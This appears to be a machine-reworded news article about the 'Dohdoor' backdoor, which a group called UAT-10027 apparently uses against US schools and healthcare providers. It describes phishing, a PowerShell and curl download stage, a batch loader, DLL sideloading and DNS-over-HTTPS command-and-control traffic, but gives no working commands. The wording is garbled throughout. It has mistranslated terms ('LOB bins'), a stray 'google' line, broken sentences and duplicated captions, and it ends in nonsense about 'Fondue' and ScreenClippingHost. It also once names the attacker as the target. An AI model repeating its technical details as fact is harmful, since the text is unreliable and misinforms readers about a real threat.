A new strain of malware is infiltrating schools and healthcare sectors across America through a multi-stage attack sequence.

Researchers have uncovered an emerging cyber threat specifically aimed at schools and medical facilities in America starting as early as January of this year.

An unidentified entity labeled as "UAT-10027" employs a covert entry method known as "Dohdoor," utilizing sophisticated tactics for both concealment and layered deployment in order to maintain unauthorized control over targeted systems.

A new strain of malicious software indicates an increasing tendency for cybercriminals skilled in exploiting vulnerabilities towards industries dealing with private information yet lacking adequate protective measures.

The domain does not derive solely from using the DNS-over-HTTPS technology for communication between itself and C2 servers; this approach transforms an established network infrastructure into a secure data transmission pathway.

Utilizing Cloudflare's secure DNS system for directing malicious C2 communication routes ensures these activities look like standard HTTP/HTTPS data flowing normally across typical networks.

A malicious entity strengthens its disguise through domain name variations such as "msoWinsoftUpdate" and "deepInspectionSystem," which resemble authentic software updates or security checks.

google

Differences in case among characters of domain names not adhering to standard TLDs – like ". Online," ". Design," and ". Software "SOFTWARE" facilitates campaigns in circumventing automatic pattern-recognition barriers and blacklist protections.

Talos researchers detected an active cyber attack targeting UAT-10027, which they linked back to malicious use of legitimate Windows files called LOB bins for implanting Dohdoor malware onto infected machines.

The study revealed that the organization's system was meticulously crafted to prevent identification by hiding command-and-control server locations within Cloudflare's widely recognized global caching layer, thereby complicating attempts at intercepting and filtering out attackers' communications.

A preliminary detection occurred via anomalous download activity flagged by Talos, which correlated this trend with an array of sophisticated attacks targeting educational institutions and health care facilities.

It's hypothesized that an attacker uses deceptive email messages designed to install a PowerShell payload onto their target system.

Upon execution, this program employs curl. Download a potentially harmful executable by entering its encrypted address for obtaining a Trojanized Windows. bat script—either named as such. Batch script - sourced remotely via an auxiliary repository.

Attack chain (Source - Cisco Talos)

Attack chain (Source – Cisco Talos)

It initiates an intricate infection cycle wherein every phase leads smoothly into the subsequent step, thereby reducing the malware's presence at all times simultaneously.

Inside the Multi-Stage Infection Mechanism

This executable file serves dual purposes: it functions as an installer for malicious software while also clearing up any remnants left behind by its intrusion into the system.

Initially, this malware establishes an unnoticeable workspace within either C:\ProgramData or C:\Users\Public directories before downloading a harmful component called a DLL file directly from its command-and-control server, concealing itself as seemingly harmless programs such as "propsys". DLL file or BAT utility. The word "dll" is an abbreviation for dynamic link library in computer programming contexts.

A decompiled version of the Windows batch file containing C2 URL references has been provided by Cisco Talos.

A decompiled version of the Windows batch file containing C2 URL references has been provided by Cisco Talos.

Legal versions of Windows programs like Fondue. The system administrator monitors equipment performance. Additionally, include ScreenClippingHost in your list.